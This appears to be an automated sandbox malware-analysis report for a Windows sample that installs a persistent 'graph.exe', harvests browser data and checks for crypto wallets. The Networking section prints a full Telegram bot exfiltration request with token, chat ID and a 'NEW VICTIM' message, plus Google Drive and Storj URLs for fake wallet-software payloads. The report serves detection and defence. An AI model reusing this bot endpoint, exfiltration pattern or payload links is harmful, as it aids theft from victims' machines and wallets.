Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1573853
MD5: 3567cb15156760b2f111512ffdbc1451
SHA1: 2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256: 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
Tags: exe, user-Bitsight

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to determine the online IP of the system
Creates files in the system32 config directory
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to enumerate network shares
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 2892 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • file.exe (PID: 5576 cmdline: C:\Users\user\Desktop\file.exe MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 7108 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 5068 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 5008 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • cleanup
No configs have been found
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive
Description: Detects images embedding archives. Observed in TheRat RAT.
Author: ditekSHen
Strings:
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png
Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive
Description: Detects images embedding archives. Observed in TheRat RAT.
Author: ditekSHen
Strings:
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00

Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive
Description: Detects images embedding archives. Observed in TheRat RAT.
Author: ditekSHen
Strings:
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Program Files\Windows Media Player\graph\graph.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph
No Suricata rule has matched

AV Detection

Source: file.exe, ReversingLabs: Detection: 63%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
Source: file.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe, Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\Desktop\file.exe, Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\Desktop\file.exe, Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\Desktop\file.exe, Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\Desktop\file.exe, Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: unknown, HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: file.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: file.exe, graph.exe, graph.exe.0.dr
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: file.exe
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF72C9B8A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF72C9B9B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF72C9EE3CC FindClose,FindFirstFileExW,GetLastError
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF72C9EE440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF72CA1070C FindFirstFileExW
Source: C:\Program Files\Windows Media Player\graph\graph.exe, Code function: 4_2_00007FF67D6FCD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle
Source: C:\Program Files\Windows Media Player\graph\graph.exe, Code function: 4_2_00007FF67D70FA54 FindFirstFileExW
Source: C:\Program Files\Windows Media Player\graph\graph.exe, Code function: 4_2_00007FF67D6FCD08 FindClose,FindFirstFileExW,GetLastError

Networking

Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF72C9C3CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF72C9C3CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json
Source: unknown, DNS query: name: api.telegram.org
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 34.117.59.81
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, DNS query: name: ipinfo.io
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF72C9C4D20 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: global traffic, HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1, User-Agent: FileDownloader, Host: drive.google.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1, User-Agent: FileDownloader, Cache-Control: no-cache, Host: drive.usercontent.google.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /json HTTP/1.1, User-Agent: IPInfoFetcher, Host: ipinfo.io, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1, User-Agent: TelegramBot, Host: api.telegram.org, Cache-Control: no-cache
Source: global traffic, DNS traffic detected: DNS query: drive.google.com
Source: global traffic, DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic, DNS traffic detected: DNS query: ipinfo.io
Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
Source: file.exe, String found in binary or memory: http://microsoft.co
Source: file.exe, String found in binary or memory: http://schemas.micro
Source: file.exe, String found in binary or memory: https://api.telegram.org/
Source: file.exe, String found in binary or memory: https://api.telegram.org/bot
Source: file.exe, String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: file.exe, String found in binary or memory: https://api.telegram.org/botFailed
Source: file.exe, String found in binary or memory: https://api.telegram.org/f
Source: file.exe, String found in binary or memory: https://api.telegram.org/r
Source: file.exe, String found in binary or memory: https://chrome.g
Source: file.exe, String found in binary or memory: https://chrome.goo
Source: file.exe, String found in binary or memory: https://chrome.google.com/websto
Source: file.exe, String found in binary or memory: https://chrome.google.com/webstore
Source: file.exe, String found in binary or memory: https://chrome.google.com/webstore$
Source: file.exe, String found in binary or memory: https://chrome.google.com/webstoreh
Source: file.exe, String found in binary or memory: https://chrome.google.com/webstores
Source: file.exe, String found in binary or memory: https://chrome.google.com/webstorev
Source: file.exe, String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: file.exe, String found in binary or memory: https://clients2.google.com/service/update2/crxB
Source: file.exe, String found in binary or memory: https://clients2.google.com/service/update2/crxG&~
Source: file.exe, String found in binary or memory: https://clients2.google.com/service/update2/crxj
Source: file.exe, String found in binary or memory: https://clients2.google.com/service/update2/crxtinZ
Source: file.exe, String found in binary or memory: https://docs.google.com/
Source: file.exe, String found in binary or memory: https://drive-autopush.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-daily-1.corp.google.com
Source: file.exe, String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-daily-2.corp.google.co
Source: file.exe, String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-preprod.corp.g
Source: file.exe, String found in binary or memory: https://drive-preprod.corp.gH
Source: file.exe, String found in binary or memory: https://drive-preprod.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive-staging.corp.google.com/
Source: file.exe, String found in binary or memory: https://drive.google.co
Source: file.exe, String found in binary or memory: https://drive.google.com/
Source: file.exe, String found in binary or memory: https://drive.google.com/uc?id=
Source: file.exe, String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: file.exe, String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download:
Source: file.exe, String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadYaZ29A4JaDrWxIN2le.c
Source: file.exe, String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloades
Source: file.exe, String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloads
Source: file.exe, String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadt
Source: file.exe, String found in binary or memory: https://drive.google.com/uc?id=URL:
Source: file.exe, String found in binary or memory: https://drive.usercontent.google.com/
Source: file.exe, String found in binary or memory: https://drive.usercontent.google.com/I
Source: file.exe, String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: file.exe, 00000000.00000002.2302798915.000001E429270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadL
Source: file.exe, 00000002.00000003.2285157291.00000207054F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285357807.00000207054FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadN
Source: file.exe, 00000000.00000002.2302541318.000001E427663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.2302541318.000001E4275F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: file.exe, 00000002.00000002.2326755680.0000020705E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/c
Source: file.exeString found in binary or memory: https://ipinfo.io/json
Source: file.exeString found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonUU
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json_U
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsongU
Source: file.exe, 00000002.00000002.2326412111.00000207054F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonhz
Source: file.exe, 00000000.00000003.2280624154.000001E4276A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonoU
Source: json[1].json.2.dr, json[1].json.0.drString found in binary or memory: https://ipinfo.io/missingauth
Source: file.exe, 00000002.00000002.2326755680.0000020705E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/o
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
Source: file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183385984.00000207054B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183348068.00000207054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
Source: file.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js16FBB22_ty
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js77ED382
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsF
Source: file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsF6B34A4rmi
Source: file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183385984.00000207054B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183348068.00000207054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/
Source: file.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js4EEE6F7Frro
Source: file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js56D1DC42est
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsCCDD9E26
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js~
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: file.exe, 00000002.00000003.2183099205.00000207054B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183315394.00000207054BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/=B~
Source: file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/D
Source: file.exe, 00000002.00000003.2183099205.00000207054B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/_C
Source: file.exe, 00000000.00000003.2172989536.000001E427674000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175064933.000001E427676000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174902630.000001E427674000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172803550.000001E42765E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/hjai
Source: file.exe, 00000000.00000003.2174782172.000001E42764A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/om/
Source: file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2182984321.0000020705493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
Source: file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: file.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly0C8FF72CtsE
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyCCDD9E26
Source: file.exe, 00000000.00000003.2175007024.000001E427635000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174877070.000001E427634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyE7ECA491j
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyE7ECA491rro
Source: file.exe, 00000000.00000003.2173656848.000001E42763B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore7
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore8
